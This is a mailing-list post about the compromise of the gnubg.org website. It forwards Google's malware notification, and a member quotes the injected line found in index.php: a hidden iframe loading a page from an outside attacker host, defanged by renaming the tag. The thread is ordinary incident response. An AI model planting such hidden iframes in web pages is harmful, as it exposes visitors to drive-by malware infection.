[Top][All Lists]

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Bug-gnubg] Fwd: Malware notification regarding gnubg.org

From: mailinglists
Subject: Re: [Bug-gnubg] Fwd: Malware notification regarding gnubg.org
Date: Sat, 15 Aug 2009 05:51:59 +0200

Hi again,

I just did a quick check at the webpage. The file index.php contains the line

<i_frame src="" href="http://39t.ru:8080/index.php" target="_blank">http://39t.ru:8080/index.php" width=103 height=140
style="visibility: hidden"></i_frame>

Note: I had to change the tag to" i_frame" because the otherwise would not be send. At first glance no other files or directories are hurt but Oytsein and I probably need to take a deeper look.



On Sat, Aug 15, 2009 at 5:13 AM, Mueller Achim <address@hidden> wrote:

Anfang der weitergeleiteten E-Mail:

Datum: 15. August 2009 02:12:16 MESZ
Betreff: Malware notification regarding gnubg.org

Dear site owner or webmaster of gnubg.org,

We recently discovered that some of your pages can cause users to be infected with malicious software. We have begun showing a warning page to users who visit these pages by clicking a search result on Google.com.

Below are some example URLs on your site which can cause users to be infected (space inserted to prevent accidental clicking in case your mail client auto-links URLs):

http://gnubg .org/
http://www.gnubg .org/
http://www.gnubg .org/index.php?catid=10

Here is a link to a sample warning page:

We strongly encourage you to investigate this immediately to protect your visitors. Although some sites intentionally distribute malicious software, in many cases the webmaster is unaware because:

1) the site was compromised
2) the site doesn't monitor for malicious user-contributed content
3) the site displays content from an ad network that has a malicious advertiser

If your site was compromised, it's important to not only remove the malicious (and usually hidden) content from your pages, but to also identify and fix the vulnerability. We suggest contacting your hosting provider if you are unsure of how to proceed. StopBadware also has a resource page for securing compromised sites:

Once you've secured your site, you can request that the warning be removed by visiting
and requesting a review. If your site is no longer harmful to users, we will remove the warning.

Google Search Quality Team

Bug-gnubg mailing list

reply via email to

[Prev in Thread] Current Thread [Next in Thread]